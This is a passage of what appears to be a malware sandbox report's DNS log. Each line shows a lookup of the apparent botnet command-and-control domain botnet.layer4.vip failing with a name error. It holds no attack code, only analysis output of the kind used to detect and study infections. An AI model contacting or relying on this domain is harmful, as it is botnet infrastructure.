                                  Apr 9, 2023 03:32:08.138108969 CEST8.8.8.8192.168.2.230x1f02Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.177942038 CEST8.8.8.8192.168.2.230xc3d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.258268118 CEST8.8.8.8192.168.2.230xc3d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.274207115 CEST8.8.8.8192.168.2.230x8f4cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.289709091 CEST8.8.8.8192.168.2.230x8f4cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.313827991 CEST8.8.8.8192.168.2.230x8f4cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.369827986 CEST8.8.8.8192.168.2.230x3c97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.418431997 CEST8.8.8.8192.168.2.230x3c97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.442641973 CEST8.8.8.8192.168.2.230x3c97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.466685057 CEST8.8.8.8192.168.2.230x3c97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.521967888 CEST8.8.8.8192.168.2.230x54b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.626185894 CEST8.8.8.8192.168.2.230x46efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.650291920 CEST8.8.8.8192.168.2.230x46efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.770271063 CEST8.8.8.8192.168.2.230x45d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.794406891 CEST8.8.8.8192.168.2.230x5201Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.834316969 CEST8.8.8.8192.168.2.230x5201Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.850305080 CEST8.8.8.8192.168.2.230x5201Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.930042028 CEST8.8.8.8192.168.2.230x56e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.945916891 CEST8.8.8.8192.168.2.230x56e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.010178089 CEST8.8.8.8192.168.2.230x431dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.026355028 CEST8.8.8.8192.168.2.230x431dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.082338095 CEST8.8.8.8192.168.2.230x490cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.179230928 CEST8.8.8.8192.168.2.230x490cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.194827080 CEST8.8.8.8192.168.2.230x42bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.210489035 CEST8.8.8.8192.168.2.230x42bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.282037020 CEST8.8.8.8192.168.2.230x4614Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.297553062 CEST8.8.8.8192.168.2.230x4614Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.321954012 CEST8.8.8.8192.168.2.230x4614Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.369164944 CEST8.8.8.8192.168.2.230x102aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.400600910 CEST8.8.8.8192.168.2.230x102aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.424721956 CEST8.8.8.8192.168.2.230x102aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.464724064 CEST8.8.8.8192.168.2.230x8ed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.488842964 CEST8.8.8.8192.168.2.230x8ed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.504367113 CEST8.8.8.8192.168.2.230x8ed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.528922081 CEST8.8.8.8192.168.2.230x8ed5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.657943010 CEST8.8.8.8192.168.2.230x74a6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.689554930 CEST8.8.8.8192.168.2.230x4028Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.713999033 CEST8.8.8.8192.168.2.230x4028Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.729852915 CEST8.8.8.8192.168.2.230x4028Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.761364937 CEST8.8.8.8192.168.2.230x13bcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.785887003 CEST8.8.8.8192.168.2.230x13bcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.852062941 CEST8.8.8.8192.168.2.230x13bcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.867842913 CEST8.8.8.8192.168.2.230x7bc4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.883312941 CEST8.8.8.8192.168.2.230x7bc4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.899255037 CEST8.8.8.8192.168.2.230x7bc4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.947818995 CEST8.8.8.8192.168.2.230x7bc4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:09.988473892 CEST8.8.8.8192.168.2.230xe811Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.093276978 CEST8.8.8.8192.168.2.230x71faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.117711067 CEST8.8.8.8192.168.2.230x71faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.133263111 CEST8.8.8.8192.168.2.230x71faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.149159908 CEST8.8.8.8192.168.2.230x71faName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.189376116 CEST8.8.8.8192.168.2.230x1e36Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.205202103 CEST8.8.8.8192.168.2.230x1e36Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.221071005 CEST8.8.8.8192.168.2.230x1e36Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.358623981 CEST8.8.8.8192.168.2.230x481eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.374389887 CEST8.8.8.8192.168.2.230xddcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.462620020 CEST8.8.8.8192.168.2.230xddcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.511198997 CEST8.8.8.8192.168.2.230x37cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.526799917 CEST8.8.8.8192.168.2.230x37cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.582231045 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.597754955 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.621895075 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.646207094 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.662112951 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.717704058 CEST8.8.8.8192.168.2.230xc92dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.733308077 CEST8.8.8.8192.168.2.230xc92dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.813579082 CEST8.8.8.8192.168.2.230x1729Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.844187975 CEST8.8.8.8192.168.2.230x1729Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.899645090 CEST8.8.8.8192.168.2.230x8a5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:10.930932999 CEST8.8.8.8192.168.2.230x8a5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.051317930 CEST8.8.8.8192.168.2.230xe58aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.091689110 CEST8.8.8.8192.168.2.230x9891Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.107512951 CEST8.8.8.8192.168.2.230x9891Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.131505966 CEST8.8.8.8192.168.2.230x9891Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.171540022 CEST8.8.8.8192.168.2.230x164fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.211429119 CEST8.8.8.8192.168.2.230x164fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.235476017 CEST8.8.8.8192.168.2.230x164fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.299556017 CEST8.8.8.8192.168.2.230x4efcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.315406084 CEST8.8.8.8192.168.2.230x4efcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.330864906 CEST8.8.8.8192.168.2.230x4efcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.346677065 CEST8.8.8.8192.168.2.230x4efcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.402460098 CEST8.8.8.8192.168.2.230xdda3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.450728893 CEST8.8.8.8192.168.2.230xdda3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.466661930 CEST8.8.8.8192.168.2.230x2b35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.521729946 CEST8.8.8.8192.168.2.230x2b35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.537239075 CEST8.8.8.8192.168.2.230x2b35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.553030968 CEST8.8.8.8192.168.2.230x5a20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.601162910 CEST8.8.8.8192.168.2.230x5a20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.641009092 CEST8.8.8.8192.168.2.230x5a20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.711992025 CEST8.8.8.8192.168.2.230xb6eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.767596960 CEST8.8.8.8192.168.2.230x1cccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.799091101 CEST8.8.8.8192.168.2.230x1cccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.814667940 CEST8.8.8.8192.168.2.230x1cccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.870017052 CEST8.8.8.8192.168.2.230x390dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.894128084 CEST8.8.8.8192.168.2.230x390dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.909693956 CEST8.8.8.8192.168.2.230x390dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.941107988 CEST8.8.8.8192.168.2.230xf697Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.965188980 CEST8.8.8.8192.168.2.230xf697Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.012515068 CEST8.8.8.8192.168.2.230xb1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.061666965 CEST8.8.8.8192.168.2.230xb1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.085827112 CEST8.8.8.8192.168.2.230xb1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.134366035 CEST8.8.8.8192.168.2.230x543cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.199131966 CEST8.8.8.8192.168.2.230x543cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.215084076 CEST8.8.8.8192.168.2.230x543cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.230793953 CEST8.8.8.8192.168.2.230xdd22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.294837952 CEST8.8.8.8192.168.2.230xdd22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.358781099 CEST8.8.8.8192.168.2.230xef8eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.431711912 CEST8.8.8.8192.168.2.230xef8eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.447551012 CEST8.8.8.8192.168.2.230x2531Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.463365078 CEST8.8.8.8192.168.2.230x2531Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.534981012 CEST8.8.8.8192.168.2.230x18b5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.550720930 CEST8.8.8.8192.168.2.230x18b5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.623569012 CEST8.8.8.8192.168.2.230x18b5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.639061928 CEST8.8.8.8192.168.2.230xe197Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.686310053 CEST8.8.8.8192.168.2.230xe197Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.758093119 CEST8.8.8.8192.168.2.230x40f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.782231092 CEST8.8.8.8192.168.2.230x40f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.806365013 CEST8.8.8.8192.168.2.230x40f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.838200092 CEST8.8.8.8192.168.2.230xeebcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.862863064 CEST8.8.8.8192.168.2.230xeebcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.902899981 CEST8.8.8.8192.168.2.230xeebcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.927242041 CEST8.8.8.8192.168.2.230x11c2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.951738119 CEST8.8.8.8192.168.2.230x11c2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.967732906 CEST8.8.8.8192.168.2.230x11c2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.071491003 CEST8.8.8.8192.168.2.230x47d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.087412119 CEST8.8.8.8192.168.2.230x47d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.102863073 CEST8.8.8.8192.168.2.230x47d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.118469954 CEST8.8.8.8192.168.2.230xfe30Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.142560005 CEST8.8.8.8192.168.2.230xfe30Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.197864056 CEST8.8.8.8192.168.2.230xfe30Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.221982956 CEST8.8.8.8192.168.2.230xdbc5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.277748108 CEST8.8.8.8192.168.2.230xdbc5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.301863909 CEST8.8.8.8192.168.2.230xdbc5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.317811012 CEST8.8.8.8192.168.2.230x3ff1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.333619118 CEST8.8.8.8192.168.2.230x3ff1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.373878956 CEST8.8.8.8192.168.2.230x3ff1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.413616896 CEST8.8.8.8192.168.2.230x84d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.437906981 CEST8.8.8.8192.168.2.230x84d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.453474045 CEST8.8.8.8192.168.2.230x84d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.493124008 CEST8.8.8.8192.168.2.230x84d4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.508960009 CEST8.8.8.8192.168.2.230xbe79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.597537041 CEST8.8.8.8192.168.2.230xbe79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.613106966 CEST8.8.8.8192.168.2.230x7914Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.628659964 CEST8.8.8.8192.168.2.230x7914Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.644558907 CEST8.8.8.8192.168.2.230x7914Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.660406113 CEST8.8.8.8192.168.2.230x7914Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.733127117 CEST8.8.8.8192.168.2.230x82e2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.748960972 CEST8.8.8.8192.168.2.230x82e2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.811928034 CEST8.8.8.8192.168.2.230x34e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.843296051 CEST8.8.8.8192.168.2.230x34e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.867480040 CEST8.8.8.8192.168.2.230x34e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.979758024 CEST8.8.8.8192.168.2.230x8a31Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.004292011 CEST8.8.8.8192.168.2.230xe0a6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.020633936 CEST8.8.8.8192.168.2.230xe0a6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.045044899 CEST8.8.8.8192.168.2.230xe0a6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.069473982 CEST8.8.8.8192.168.2.230xe0a6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.142999887 CEST8.8.8.8192.168.2.230xf541Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.158574104 CEST8.8.8.8192.168.2.230xf541Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.174088001 CEST8.8.8.8192.168.2.230xf541Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.190934896 CEST8.8.8.8192.168.2.230xf541Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.271410942 CEST8.8.8.8192.168.2.230xf0feName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.303189993 CEST8.8.8.8192.168.2.230x78f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.351375103 CEST8.8.8.8192.168.2.230x78f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.393423080 CEST8.8.8.8192.168.2.230xc5f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.409898043 CEST8.8.8.8192.168.2.230xc5f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.475754023 CEST8.8.8.8192.168.2.230xc5f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.493819952 CEST8.8.8.8192.168.2.230x23afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.534013987 CEST8.8.8.8192.168.2.230x23afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.617908955 CEST8.8.8.8192.168.2.230x2ff2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.633861065 CEST8.8.8.8192.168.2.230x2ff2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.654777050 CEST8.8.8.8192.168.2.230x2ff2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.679418087 CEST8.8.8.8192.168.2.230x2ff2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.708381891 CEST8.8.8.8192.168.2.230x2ff2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.724826097 CEST8.8.8.8192.168.2.230x4101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.740726948 CEST8.8.8.8192.168.2.230x4101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.756406069 CEST8.8.8.8192.168.2.230x4101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.772320986 CEST8.8.8.8192.168.2.230x4101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.830337048 CEST8.8.8.8192.168.2.230xad19Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.943262100 CEST8.8.8.8192.168.2.230xf1d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.958748102 CEST8.8.8.8192.168.2.230xf1d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.038247108 CEST8.8.8.8192.168.2.230xb59cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.101936102 CEST8.8.8.8192.168.2.230xb59cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.126041889 CEST8.8.8.8192.168.2.230x94a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.151940107 CEST8.8.8.8192.168.2.230x94a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.216449976 CEST8.8.8.8192.168.2.230x94a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:15.241009951 CEST8.8.8.8192.168.2.230x4397Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
